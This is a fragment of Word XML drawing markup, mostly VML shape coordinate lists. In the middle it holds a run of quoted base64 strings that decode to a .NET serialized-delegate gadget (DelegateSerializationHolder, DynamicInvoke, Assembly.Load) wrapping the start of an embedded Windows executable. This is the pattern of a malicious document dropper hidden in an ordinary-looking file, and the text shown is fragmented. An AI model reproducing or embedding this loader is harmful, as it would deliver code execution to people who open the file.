2800,9643,2800,9645,2800,9647,2800,9648,2800,9650,2800,9652,2800,9654,2800,9655,2800,9657,2800,9659,2800,9661,2800,9664,2800,9666,2800,9668,2800,9670,2800,9673,2800,9675,2800,9678,2800,9680,2800,9683,2800,9686,2800,9688,2800,9691,2800,9694,2800,9697,2800,9700,2800,9704,2800,9707,2800,9710,2800,9714,2800,9717,2800,9721,2800,9724,2800,9728,2800,9732,2800,9736,2800,9740,2800,9744,2800,9748,2800,9752,2800,9756,2800,9761,2800,9765,2800,9770,2800,9775,2800,9779,2800,9784,2800,9789,2800,9794,2800,9799,2800,9805,2800,9810,2800,9815,2800,9821,2800,9827,2800,9832,2800,9838,2800,9844,2800,9850,2800,9856,2800,9863,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2798,9869,2798,9869,2798,9869,2798,9869,2798,9869,2797,9869,2797,9869,2797,9869,2797,9869,2796,9869,2796,9869,2795,9869,2795,9869,2795,9869,2794,9869,2794,9869,2793,9869,2793,9869,2793,9869,2792,9869,2792,9869,2791,9869,2790,9869,2790,9869,2789,9869,2789,9869,2788,9869,2787,9869,2787,9869,2786,9869,2785,9869,2784,9869,2783,9869,2783,9869,2782,9869,2781,9869,2780,9869,2779,9869,2778,9869,2777,9869,2776,9869,2775,9869,2774,9869,2773,9869,2772,9869,2770,9869,2769,9869,2768,9869,2767,9869,2765,9869,2764,9869,2763,9869,2761,9869,2760,9869,2758,9869,2757,9869,2755,9869,2753,9869,2752,9869,2750,9869,2748,9869,2747,9869,2745,9869,2743,9869,2741,9869,2739,9869,2737,9869,2735,9869,2733,9869,2731,9869,2729,9869,2727,9869,2725,9869,2723,9869,2720,9869,2718,9869,2716,9869,2713,9869,2711,9869,2708,9869,2706,9869,2703,9869,2700,9869,2698,9869,2695,9869,2692,9869,2689,9869,2686,9869,2683,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9867,2680,9867,2680,9867,2680,9867,2680,9866,2680,9866,2680,9866,2680,9865,2680,9865,2680,9864,2680,9864,2680,9864,2680,9863,2680,9862,2680,9862,2680,9861,2680,9861,2680,9860,2680,9859,2680,9859,2680,9858,2680,9857,2680,9856,2680,9855,2680,9854,2680,9853,2680,9852,2680,9851,2680,9850,2680,9849,2680,9848,2680,9846,2680,9845,2680,9844,2680,9842,2680,9841,2680,9839,2680,9838,2680,9836,2680,9835,2680,9833,2680,9831,2680,9829,2680,9827,2680,9825,2680,9823,2680,9821,2680,9819,2680,9817,2680,9815,2680,9812,2680,9810,2680,9808,2680,9805,2680,9803,2680,9800,2680,9797,2680,9794,2680,9791,2680,9789,2680,9785,2680,9782,2680,9779,2680,9776,2680,9773,2680,9769,2680,9766,2680,9762,2680,9759,2680,9755,2680,9751,2680,9747,2680,9743,2680,9739,2680,9735,2680,9731,2680,9726,2680,9722,2680,9718,2680,9713,2680,9708,2680,9704,2680,9699,2680,9694,2680,9689,2680,9684,2680,9678,2680,9673,2680,9667,2680,9662,2680,9656,2680,9651,2680,9645,2680,9639,2680,9633,2680,9626,2680,9620,268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90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5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3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19,2800,11623,2800,11627,2800,11630,2800,11634,2800,11638,2800,11642,2800,11646,2800,11650,2800,11654,2800,11658,2800,11662,2800,11667,2800,11671,2800,11676,2800,11680,2800,11685,2800,11690,2800,11695,2800,11700,2800,11705,2800,11711,2800,11716,2800,11721,2800,11727,2800,11733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2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3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1,2800,13493,2800,13495,2800,13497,2800,13500,2800,13502,2800,13505,2800,13507,2800,13510,2800,13513,2800,13515,2800,13518,2800,13521,2800,13524,2800,13527,2800,13531,2800,13534,2800,13537,2800,13540,2800,13544,2800,13547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4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5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3.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14050;width:130;height:270" coordorigin="2670,14050" coordsize="130,270" path="m2680,14071l2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2683,14071,2683,14071,2683,14071,2683,14071,2684,14071,2684,14071,2684,14071,2685,14071,2685,14071,2685,14071,2686,14071,2686,14071,2686,14071,2687,14071,2687,14071,2688,14071,2688,14071,2689,14071,2689,14071,2690,14071,2690,14071,2691,14071,2692,14071,2692,14071,2693,14071,2694,14071,2694,14071,2695,14071,2696,14071,2697,14071,2697,14071,2698,14071,2699,14071,2700,14071,2701,14071,2702,14071,2703,14071,2704,14071,2705,14071,2706,14071,2707,14071,2708,14071,2709,14071,2710,14071,2712,14071,2713,14071,2714,14071,2715,14071,2717,14071,2718,14071,2720,14071,2721,14071,2723,14071,2724,14071,2726,14071,2727,14071,2729,14071,2731,14071,2732,14071,2734,14071,2736,14071,2738,14071,2740,14071,2741,14071,2743,14071,2745,14071,2747,14071,2749,14071,2752,14071,2754,14071,2756,14071,2758,14071,2760,14071,2763,14071,2765,14071,2768,14071,2770,14071,2773,14071,2775,14071,2778,14071,2780,14071,2783,14071,2786,14071,2789,14071,2792,14071,2794,14071,2797,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14073,2800,14073,2800,14073,2800,14073,2800,14074,2800,14074,2800,14074,2800,14075,2800,14075,2800,14076,2800,14076,2800,14077,2800,14077,2800,14078,2800,14078,2800,14079,2800,14079,2800,14080,2800,14081,2800,14082,2800,14082,2800,14083,2800,14084,2800,14085,2800,14086,2800,14087,2800,14088,2800,14089,2800,14090,2800,14091,2800,14092,2800,14094,2800,14095,2800,14096,2800,14098,2800,14099,2800,14101,2800,14102,2800,14104,2800,14105,2800,14107,2800,14109,2800,14111,2800,14113,2800,14115,2800,14117,2800,14119,2800,14121,2800,14123,2800,14125,2800,14128,2800,14130,2800,14132,2800,14135,2800,14138,2800,14140,2800,14143,2800,14146,2800,14149,2800,14152,2800,14155,2800,14158,2800,14161,2800,14164,2800,14167,2800,14171,2800,14174,2800,14178,2800,14181,2800,14185,2800,14189,2800,14193,2800,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,14326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14135,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,268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"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2Vya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WFsaXph"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"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb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25Ib2xk"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"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJA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gAAAAkD"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29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"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0Rlb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GVnYXRl"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"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50Y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XJnZXRU"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"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ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2F0ZVNl"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"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lL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lJlbW90"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"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249M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i4wLjAu"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"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5B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gcAAAAH"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"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZ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QoEAwAA"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"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0Y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XJnZXQw"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"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ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2F0ZUVu"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"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlc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gkLAAAA"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"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpe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mF0aW9u"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"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lb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WJlclR5"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"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJC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QAAAAYR"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"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAA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AoBCwAA"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"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c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3RlbS5Y"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"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlb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j1iNzdh"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"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb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24uQXNz"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"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzI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HByb2dy"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"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAVC1CX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4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4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6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8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8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8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7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8,2800,1340,2800,1341,2800,1343,2800,1344,2800,1346,2800,1347,2800,1349,2800,1351,2800,1353,2800,1354,2800,1356,2800,1358,2800,1360,2800,1362,2800,1364,2800,1367,2800,1369,2800,1371,2800,1374,2800,1376,2800,1379,2800,1381,2800,1384,2800,1387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9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8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4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1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7,2680,2825,2680,2824,2680,2823,2680,2822,2680,2820,2680,2819,2680,2817,2680,2816,2680,2814,2680,2813,2680,2811,2680,2809,2680,2808,2680,2806,2680,2804,2680,2802,2680,2800,2680,2798,2680,2796,2680,2794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299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0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5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4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8,2680,4705,2680,4703,2680,4700,2680,4697,2680,4695,2680,4692,2680,4689,2680,4686,2680,4683,2680,4680,2680,4677,2680,4673,2680,4670,2680,4667,2680,4663,2680,4660,2680,4656,2680,4652,2680,4649,2680,4645,2680,4641,2680,4637,2680,4632,2680,4628,2680,4624,2680,4619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6,2680,5395,2680,5395,2680,5395,2680,5395,2680,5394,2680,5394,2680,5394,2680,5393,2680,5393,2680,5393,2680,5392,2680,5392,2680,5391,2680,5391,2680,5390,2680,5390,2680,5389,2680,5388,2680,5388,2680,5387,2680,5386,2680,5386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4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20,2680,6018,2680,6017,2680,6015,2680,6014,2680,6013,2680,6011,2680,6009,2680,6008,2680,6006,2680,6004,2680,6002,2680,6000,2680,5999,2680,5997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5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9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7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7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9,2800,8513,2800,8519,2800,8524,2800,8529,2800,8534,2800,8540,2800,8545,2800,8551,2800,8557,2800,8563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5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45.500pt;margin-top:479.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,9590" coordsize="130,270">
        <v:shape style="position:absolute;left:2910;top:9590;width:130;height:270" coordorigin="2910,9590" coordsize="130,270" path="m2920,9614l2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2921,9614,2922,9614,2922,9614,2922,9614,2922,9614,2922,9614,2922,9614,2923,9614,2923,9614,2923,9614,2923,9614,2924,9614,2924,9614,2924,9614,2924,9614,2925,9614,2925,9614,2925,9614,2926,9614,2926,9614,2927,9614,2927,9614,2927,9614,2928,9614,2928,9614,2929,9614,2929,9614,2930,9614,2930,9614,2931,9614,2932,9614,2932,9614,2933,9614,2934,9614,2934,9614,2935,9614,2936,9614,2937,9614,2937,9614,2938,9614,2939,9614,2940,9614,2941,9614,2942,9614,2943,9614,2944,9614,2945,9614,2946,9614,2947,9614,2948,9614,2949,9614,2951,9614,2952,9614,2953,9614,2954,9614,2956,9614,2957,9614,2958,9614,2960,9614,2961,9614,2963,9614,2964,9614,2966,9614,2967,9614,2969,9614,2971,9614,2972,9614,2974,9614,2976,9614,2978,9614,2980,9614,2982,9614,2984,9614,2985,9614,2988,9614,2990,9614,2992,9614,2994,9614,2996,9614,2998,9614,3001,9614,3003,9614,3005,9614,3008,9614,3010,9614,3013,9614,3015,9614,3018,9614,3021,9614,3023,9614,3026,9614,3029,9614,3032,9614,3035,9614,3038,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9614,3041,9615,3041,9615,3041,9615,3041,9615,3041,9615,3041,9615,3041,9616,3041,9616,3041,9616,3041,9617,3041,9617,3041,9617,3041,9618,3041,9618,3041,9618,3041,9619,3041,9619,3041,9620,3041,9620,3041